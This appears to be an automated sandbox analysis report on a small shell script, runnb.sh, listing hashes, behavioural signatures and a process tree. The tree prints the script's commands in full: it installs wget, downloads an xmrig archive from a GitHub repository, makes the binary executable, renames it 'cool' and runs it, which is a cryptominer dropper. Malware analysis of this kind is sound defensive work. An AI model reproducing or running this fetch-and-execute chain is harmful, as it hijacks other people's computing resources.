Analysis

max time kernel: 22s
max time network: 129s
platform: ubuntu-22.04_amd64
resource: ubuntu2204-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
submitted: 30-10-2024 21:08
Static task: static1
Behavioral task: behavioral1 (Sample: runnb.sh, Resource: ubuntu2004-amd64-20240611-en)
Behavioral task: behavioral2 (Sample: runnb.sh, Resource: ubuntu2204-amd64-20240611-en)
Behavioral task: behavioral3 (Sample: runnb.sh, Resource: ubuntu2404-amd64-20240523-en)
General

Target: runnb.sh
Size: 213B
MD5: a1189543e2f98f6696c6d857b899ab0a
SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 1 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes:
  pid   process
  1649  chmod

OS Credential Dumping (1 TTPs, 1 IoCs)
Adversaries may attempt to dump credentials to use them in password cracking.
Processes:
  description              ioc          process
  File opened for reading  /etc/shadow  sudo

Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 1 IoCs)
Abuse sudo or cached sudo credentials to execute code.

Enumerates kernel/hardware configuration (1 TTPs, 8 IoCs)
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
  description              ioc                                                    process
  File opened for reading  /sys/kernel/mm/transparent_hugepage/hpage_pmd_size     snap
  File opened for reading  /sys/kernel/mm/transparent_hugepage/hpage_pmd_size     snap
  File opened for reading  /sys/kernel/mm/transparent_hugepage/hpage_pmd_size     snap
  File opened for reading  /sys/kernel/mm/transparent_hugepage/hpage_pmd_size     snap
  File opened for reading  /sys/kernel/mm/transparent_hugepage/hpage_pmd_size     snap
  File opened for reading  /sys/kernel/mm/transparent_hugepage/hpage_pmd_size     snap
  File opened for reading  /sys/kernel/mm/transparent_hugepage/hpage_pmd_size     snap
  File opened for reading  /sys/kernel/mm/transparent_hugepage/hpage_pmd_size     snap

Reads runtime system information
Processes:
  description              ioc                            process
  File opened for reading  /proc/self/fd                  apt
  File opened for reading  /proc/cmdline                  snap
  File opened for reading  /proc/filesystems              dpkg
  File opened for reading  /proc/cgroups                  snap
  File opened for reading  /proc/filesystems              sudo
  File opened for reading  /proc/self/stat                sudo
  File opened for reading  /proc/filesystems              dpkg
  File opened for reading  /proc/cgroups                  snap
  File opened for reading  /proc/cgroups                  snap
  File opened for reading  /proc/filesystems              mv
  File opened for reading  /proc/1/limits                 sudo
  File opened for reading  /proc/cgroups                  snap
  File opened for reading  /proc/self/fd                  apt
  File opened for reading  /proc/sys/kernel/ngroups_max   sudo
  File opened for reading  /proc/filesystems              dpkg
  File opened for reading  /proc/cgroups                  snap
  File opened for reading  /proc/cmdline                  snap
  File opened for reading  /proc/cgroups                  snap
  File opened for reading  /proc/cmdline                  snap
  File opened for reading  /proc/cgroups                  snap
  File opened for reading  /proc/cmdline                  snap
  File opened for reading  /proc/cmdline                  snap
  File opened for reading  /proc/filesystems              dpkg
  File opened for reading  /proc/cmdline                  snap
  File opened for reading  /proc/filesystems              tar
  File opened for reading  /proc/cmdline                  snap
  File opened for reading  /proc/cgroups                  snap
  File opened for reading  /proc/cmdline                  snap
Processes

PID 1577  /tmp/runnb.sh
          cmd: /tmp/runnb.sh
  PID 1578  /usr/bin/sudo
            cmd: sudo apt install wget
            signatures: OS Credential Dumping; Abuse Elevation Control Mechanism: Sudo and Sudo Caching; Reads runtime system information
    PID 1579  /usr/bin/apt
              cmd: apt install wget
              signatures: Reads runtime system information
      PID 1580  /usr/bin/dpkg
                cmd: /usr/bin/dpkg --print-foreign-architectures
                signatures: Reads runtime system information
      PID 1584  /usr/bin/dpkg
                cmd: /usr/bin/dpkg --print-foreign-architectures
                signatures: Reads runtime system information
      PID 1585  /bin/sh
                cmd: /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
        PID 1586  /usr/bin/snap
                  cmd: /usr/bin/snap advise-snap --from-apt
                  signatures: Enumerates kernel/hardware configuration; Reads runtime system information
      PID 1591  /bin/sh
                cmd: /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
        PID 1592  /usr/bin/snap
                  cmd: /usr/bin/snap advise-snap --from-apt
                  signatures: Enumerates kernel/hardware configuration; Reads runtime system information
      PID 1597  /bin/sh
                cmd: /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
        PID 1598  /usr/bin/snap
                  cmd: /usr/bin/snap advise-snap --from-apt
                  signatures: Enumerates kernel/hardware configuration; Reads runtime system information
      PID 1604  /bin/sh
                cmd: /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
        PID 1605  /usr/bin/snap
                  cmd: /usr/bin/snap advise-snap --from-apt
                  signatures: Enumerates kernel/hardware configuration; Reads runtime system information
  PID 1610  /usr/bin/apt
            cmd: apt install wget
            signatures: Reads runtime system information
    PID 1611  /usr/bin/dpkg
              cmd: /usr/bin/dpkg --print-foreign-architectures
              signatures: Reads runtime system information
    PID 1612  /usr/bin/dpkg
              cmd: /usr/bin/dpkg --print-foreign-architectures
              signatures: Reads runtime system information
    PID 1613  /bin/sh
              cmd: /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
      PID 1614  /usr/bin/snap
                cmd: /usr/bin/snap advise-snap --from-apt
                signatures: Enumerates kernel/hardware configuration; Reads runtime system information
    PID 1622  /bin/sh
              cmd: /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
      PID 1623  /usr/bin/snap
                cmd: /usr/bin/snap advise-snap --from-apt
                signatures: Enumerates kernel/hardware configuration; Reads runtime system information
    PID 1631  /bin/sh
              cmd: /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
      PID 1632  /usr/bin/snap
                cmd: /usr/bin/snap advise-snap --from-apt
                signatures: Enumerates kernel/hardware configuration; Reads runtime system information
    PID 1640  /bin/sh
              cmd: /bin/sh -c "[ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true"
      PID 1641  /usr/bin/snap
                cmd: /usr/bin/snap advise-snap --from-apt
                signatures: Enumerates kernel/hardware configuration; Reads runtime system information
  PID 1647  /usr/bin/wget
            cmd: wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
  PID 1648  /usr/bin/tar
            cmd: tar xvf xmrigtar.tar.gz
            signatures: Reads runtime system information
  PID 1649  /usr/bin/chmod
            cmd: chmod +x xmrig
            signatures: File and Directory Permissions Modification
  PID 1650  /usr/bin/mv
            cmd: mv xmrig cool
            signatures: Reads runtime system information
  PID 1651  /tmp/cool
            cmd: ./cool